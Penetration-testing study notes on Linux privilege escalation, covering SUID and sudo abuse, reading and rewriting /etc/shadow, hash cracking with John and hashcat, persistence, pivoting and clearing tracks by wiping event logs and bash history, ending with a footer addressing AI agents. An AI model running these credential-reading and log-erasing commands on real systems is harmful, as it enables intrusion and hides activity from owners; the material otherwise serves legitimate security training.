# 5.2 - Linux Privilege Escalation
### Linux Privilege Escalation
While the web vulnerabilities are typically always the same, when it comes to privilege escalation, itβs hard to make a complete list of all the possible ways in which one can elevate its privileges. It all depends on the specific configuration of the remote machine. Having said that, there are still common attacks that deserve to be studied. Some (not all) of these tehcniques are listed below:
* [Kernel exploitation](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md)
* PATH exploitation
* [SUID binaries exploitations](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md) ()
* [Weak file permissions](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
* [cronjob enumeration](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md) ()
* [sudo -l exploitation](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
* wildcard expansion
## Tools
As we have seen, there are tools that help us in this process:
### LinEnum
Privesc vulnerabilities can be identified automatically using the [LinEnum](https://github.com/rebootuser/LinEnum) tool.
* The below labs will focus on **manual** Linux Privilege Escalation techniques, instead
* Linux file Permissions are important
> π¬ Check
>
> * β[Linux Privesc Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-privesc)β
> * β[Linux Post Exploitation - Metasploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/linux-post-msf)
The following command will look for files (and not symlinks etc) which is world writable.
```bash
find / -not -type l -perm -o+w
find / -user root -perm -4000 -exec ls -ldb {} \; #or this
```
if we don't find nothing of anomaly, we can try to find misconfigured sudo. Check the current sudo capabilities.
```bash
sudo -l
(root) NOPASSWD: /usr/bin/man #user has root permissions for man app
```
The man entry depicts that the man command can be run using sudo without providing any password. Run it and launch /bin/bash from it.
```bash
sudo man ls
!/bin/bash
```
After this, escalated to root user is successful.
if file /etc/shadow is world writable, we can read its contents.
```bash
ls -l /etc/shadow
cat /etc/shadow
```
If root password isn't set. We can adding a known password in shadow file, one can escalate to root. Use openssl to generate a password entry.
```bash
openssl passwd -1 -salt abc password #setting new psw
```
### LinPeas
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)
{% embed url="" %}
### Bashark
It's another automatic tool to do identify vulnerabilities in Linux.
{% embed url="" %}
### Linux Exploit Suggester
In addition to the last tool, [Linux Exploit Suggester ](https://github.com/The-Z-Labs/linux-exploit-suggester)help us to suggest potential exploits.
βOf course we need to launch it on victim machine downloading it or transferring there (E.g. using a python [SimpleHTTPServer](https://docs.python.org/2/library/simplehttpserver.html))
{% embed url="" %}
{% embed url="" %}
### Linux Persistence
> β **Persistence techniques and methods usually require administrative access and must follow the rules of engagement agree with the customer.**
Persistence Techniques - MITRE ATT\&CK
Linux Server **`SSH`** service is typically enabled and an attacker can take advantage of it.
* If password login is disabled and ***key-based authentication*** is enabled, t*he attacker can copy a user's `SSH` private key and use it for future access.*
Linux **`Cron`** is a service that repeatedly runs **Cron jobs** that can be used for command execution at a fixed interval and ensure persistent access to the target system.
> π¬ Check the [Linux Persistence Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-persistence)β
### Dumping & Cracking Hashes
π Check the already covered Credential Dumping theory here:
* β[Windows Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks#windows-credential-dumping)β
* β[Linux Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/linux-attacks#linux-credential-dumping)β
After the dumping process, hashes can be cracked using:
* β[John The Ripper](https://github.com/openwall/john) - [Cheatsheetβ](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper)
* β[Hashcat](https://hashcat.net/hashcat/) - [Cheatsheet](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat)
The best thing to do in privilege escalation optical is migration of **lsass** process, because at difference between explorer.exe, it permits to upgrade sessions at 64 bit and access to lsass process cache.
After migration to lsass process, we can use utility as hashdump.
It will display a dump list of accounts and their hashes (usually NTLM hashes).
Of course, we can store it a file hashes.txt.
We can also load kiwi module, that's a module implementation of Mimikats for Meterpreter.
Now, using tools how **John The Ripper**, we can crack NTLM Hashes.
```bash
john --list=formats | grep NT
john --format=NT hashes.txt If we don't specify word list, John will use default word list, but we can use custom word list as rockyou.
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
βIn alternative we can use hashcat.
```bash
hashcat --elp
hashcat -a 3 -m 1000 hashes.txt --wordlist /usr/share/wordlists/rockyou.txt #-a 3 (attack-mode brute-force), -m 1000 (NTLM)
```
When we gaining credentials, we can use psex python script, msf module or RDP (default port 3389) by xfreerdp.
```bash
xfreerdp /u:user /p:psw /v:IP
```
It's a very good method to access and maintaining legitimate persistence.
> π¬ Check the [Cracking Hashes Labs here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/crack-hashes)β
### β[Pivoting](https://www.offsec.com/metasploit-unleashed/pivoting/)β
ποΈ **Pivoting** is a post exploitation technique of using a compromised host, a **`foothold`** / **`plant`**, to attack other systems on its private internal network.
* Once gained access to the first target host, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.
ποΈ **Port Forwarding** consists of rerouting/redirecting traffic from a target system's particular port to an attacker system's specific port.
* The service will be remotely available to the attacker system
> π¬ Check the [Pivoting Lab here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/pivoting)β
### Clearing Tracks
According to the rules of engagement, the pentester may be required to **clear any changes** that have been made to the target systems as a result of the exploitation and post-exploitation stages.A good practice is to store all artifacts payloads, scripts and binaries in these folders:
* Windows - **`C:\Temp`**
* Linux - **`/tmp`**
Metasploit Framework generates and stores a lot of artifacts on the target. *Some modules provides removal resource scripts.*
#### Windows
* Delete the **Windows Event Log** can be a good post-exploitation clearing technique.
* β **Avoid it during a regular Penetration Test, because data inside the Win Event Log is important to the customer.**
**`Metasploit e.g.`**cd C:\\\mkdir Tempcd Temp# Upload exploit into this C:\Temp directory
* Use the `Cleanup RC File`
\# Cleanup Meterpreter RC File:cat /root/.msf4/logs/persistence/ATTACKDEFENSE\_20230429.0454/ATTACKDEFENSE\_20230429.0454.rcbackgroundsessions 1resource /root/.msf4/logs/persistence/ATTACKDEFENSE\_20230429.1019/ATTACKDEFENSE\_20230429.1019.rc# Clear Windows Event Log from the Meterpreter session# An attacker could potentially do thisclearev
#### Linux
cd /tmp# Upload exploit into this /tmp directory
* `bash` history logs the activity and the used commands
* To clear the **`bash history`**
history -c
* **`~/.bash_history`** file content can be deleted too
cat /dev/null > \~/.bash\_history
* When using **Metasploit Framework** exploits, proceed manually to clear artifacts from the `/tmp` directory or other used directories.
## Cheatsheets for Pentesting
* [Windows Privilege Escalation Cheatsheet](https://dev-angelist.gitbook.io/windows-privilege-escalation/cheatsheet)
* [CRTP (Active Directory Notes) Cheatsheet](https://dev-angelist.gitbook.io/crtp-notes/crtp-cheat-sheet)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dev-angelist.gitbook.io/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
